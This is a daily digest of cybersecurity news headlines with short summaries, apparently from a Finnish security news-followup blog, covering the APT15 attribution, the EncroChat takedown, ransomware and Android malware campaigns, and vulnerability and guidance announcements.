Daily NCSC-FI news followup 2020-07-02

Connection discovered between Chinese hacker group APT15 and defense contractor

www.zdnet.com/article/connection-discovered-between-chinese-hacker-group-apt15-and-defense-contractor/ Lookout said it linked APT15 malware to Xi’an Tianhe Defense Technology, a Chinese defense contractor. In a report published today, cyber-security firm Lookout said it found evidence connecting Android malware that was used to spy on minorities in China to a large government defense contractor from the city of Xi’an.

Hundreds arrested after encrypted messaging network takeover

www.bleepingcomputer.com/news/security/hundreds-arrested-after-encrypted-messaging-network-takeover/ European law enforcement agencies arrested hundreds of suspects in several countries including France, Netherlands, the UK, Norway, and Sweden after infiltrating the EncroChat encrypted mobile communication network used by organized crime groups. EncroChat phones used by international criminal networks around the world to exchange encrypted data and millions of messages came with dual operating systems (Android OS and the EncroChat OS).

Inside a ransomware attack: From the first breach to the ransom demand

www.zdnet.com/article/inside-a-ransomware-attack-from-the-first-breach-to-encrypting-a-network-in-just-two-weeks/ Security researchers map out how a ransomware attack plays out over a two week period.

Ransomware Gangs Don’t Need PR Help

krebsonsecurity.com/2020/07/ransomware-gangs-dont-need-pr-help/ We’ve seen an ugly trend recently of tech news stories and cybersecurity firms trumpeting claims of ransomware attacks on companies large and small, apparently based on little more than the say-so of the ransomware gangs themselves. Such coverage is potentially quite harmful and plays deftly into the hands of organized crime.

Hacker ransoms 23k MongoDB databases and threatens to contact GDPR authorities

www.zdnet.com/article/hacker-ransoms-23k-mongodb-databases-and-threatens-to-contact-gdpr-authorities/ The hacker has attempted to ransom nearly 47% of all MongoDB databases left exposed online.

This is how EKANS ransomware is targeting industrial control systems

www.zdnet.com/article/this-is-how-ekans-ransomware-is-targeting-industrial-control-systems/ New samples of the ransomware reveal the techniques used to attack critical ICS systems. report:


FakeSpy Android Malware Spread Via Postal-Service’ Apps

threatpost.com/fakespy-android-malware-spread-via-postal-service-apps/157102/ New smishing’ campaigns from the Roaming Mantis threat group infect Android users with the FakeSpy infostealer.

Sixteen Facebook apps caught secretly sharing data with third-parties

www.zdnet.com/article/sixteen-facebook-apps-caught-secretly-sharing-data-with-third-parties/ Academic study used unique “honeytoken” emails to install Facebook apps and see which inboxes received emails from unrecognized senders.

Alina Point Of Sale Malware Still Lurking In DNS


G DATA threat report: Number of cyber attacks increases significantly in the first quarter

www.gdatasoftware.com/blog/2020/07/36199-number-of-cyber-attacks-increases-significantly-in-the-first-quarter The current threat analysis by G DATA CyberDefense shows that the number of attacks prevented in March 2020 has increased significantly. The cyber defence company averted almost a third more attacks than in February. Especially active – GuLoader and Trickbot. Old tricks, new losses – tech supports scams

GoldenSpy backdoor installed by tax software gets remotely removed

www.bleepingcomputer.com/news/security/goldenspy-backdoor-installed-by-tax-software-gets-remotely-removed/ As soon as security researchers uncovered the activity of GoldenSpy backdoor, the actor behind it fell back and delivered an uninstall tool to remove all traces of the malware. GoldenSpy stayed hidden in software called Intelligent Tax, from Aisino Corporation, that a Chinese bank required its company customers to install for paying local taxes.

Apache Guacamole Opens Door for Total Control of Remote Footprint

threatpost.com/apache-guacamole-control-remote-footprint/157124/ Several vulnerabilities can be chained together for a full exploit. Apache Guacamole, a popular infrastructure for enabling remote working, is vulnerable to a slew of security bugs related to the Remote Desktop Protocol (RDP), researchers have warned. Admins should update their systems to avoid attacks bent on stealing information or remote code-execution. report:



www.huoltovarmuuskeskus.fi/miten-valita-turvallinen-etatyovaline-ohjeita-ja-vinkkeja-avuksi/ Moni on tänä vuonna miettinyt, mikä etätyöhön käytettävä sovellus on turvallinen käyttää. Tästä syntyi ajatus oppaasta, joka auttaa organisaatioita, heidän työntekijöitään ja tietoturvasta vastaavia vertailemaan eri etätyövälineitä keskenään ja valitsemaan sopiva monista vaihtoehdoista. Oppaan on teettänyt Huoltovarmuusorganisaation Digipooli.

NSA releases guidance on securing IPsec Virtual Private Networks

www.bleepingcomputer.com/news/security/nsa-releases-guidance-on-securing-ipsec-virtual-private-networks/ The US National Security Agency (NSA) has published guidance on how to properly secure IP Security (IPsec) Virtual Private Networks (VPNs) against potential attacks.

Windows 10 background image tool can be abused to download malware

www.bleepingcomputer.com/news/security/windows-10-background-image-tool-can-be-abused-to-download-malware/ A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm. Researchers from SentinelOne discovered that “desktopimgdownldr.exe, ” located in Windows 10’s system32 folder, can also serve as a LoLBin.

ENISA Launches Public Consultation for First Candidate Cybersecurity Certification Scheme

www.enisa.europa.eu/news/enisa-news/enisa-launches-public-consultation-for-first-candidate-cybersecurity-certification-scheme The EUCC Candidate Scheme for ICT Products, set to replace the SOG-IS, is released today for public feedback.

We discovered the Palo Alto SAML vulnerability (CVE-2020-2012). There’s lots of confusion about the role of the ‘Disable cert validation’ check box in this issue. TLDR; Having this turned off is standard, expected, and not bad practice. Patch your PA, and leave this off.


You might be interested in …

Daily NCSC-FI news followup 2020-09-23

Phishers spoof reliable cybersecurity training company to garner clicks blog.malwarebytes.com/scams/2020/09/phishers-spoof-reliable-cybersecurity-training-company-to-garner-clicks/ It happens to the best of us. And, indeed, no adage is better suited to a phishing campaign that recently made headlines. Fraudsters used the brand, KnowBe4a trusted cybersecurity company that offers security awareness training for organizationsto gain recipients trust, their Microsoft Outlook credentials, and […]

Read More

Daily NCSC-FI news followup 2021-03-09

Dangerous Malware Dropper Found in 9 Utility Apps on Googles Play Store blog.checkpoint.com/2021/03/09/dangerous-malware-dropper-found-in-9-utility-apps-on-googles-play-store/ Check Point Research (CPR) recently discovered a new dropper spreading via the Google Play store. The dropper, dubbed Clast82, has the ability to avoid detection by Google Play Protect, complete the evaluation period successfully, and change the payload dropped from a non-malicious […]

Read More

Daily NCSC-FI news followup 2019-07-04

Sodinokibi ransomware is now using a former Windows zero-day www.zdnet.com/article/sodinokibi-ransomware-is-now-using-a-former-windows-zero-day/ A ransomware strain named Sodinokibi (also Sodin or REvil) is using a former Windows zero-day vulnerability to elevate itself to admin access on infected hosts.. see also securelist.com/sodin-ransomware/91473/ Sodin ransomware enters through MSPs www.kaspersky.com/blog/sodin-msp-ransomware/27530/ At the end of March, when we wrote about a GandCrab […]

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.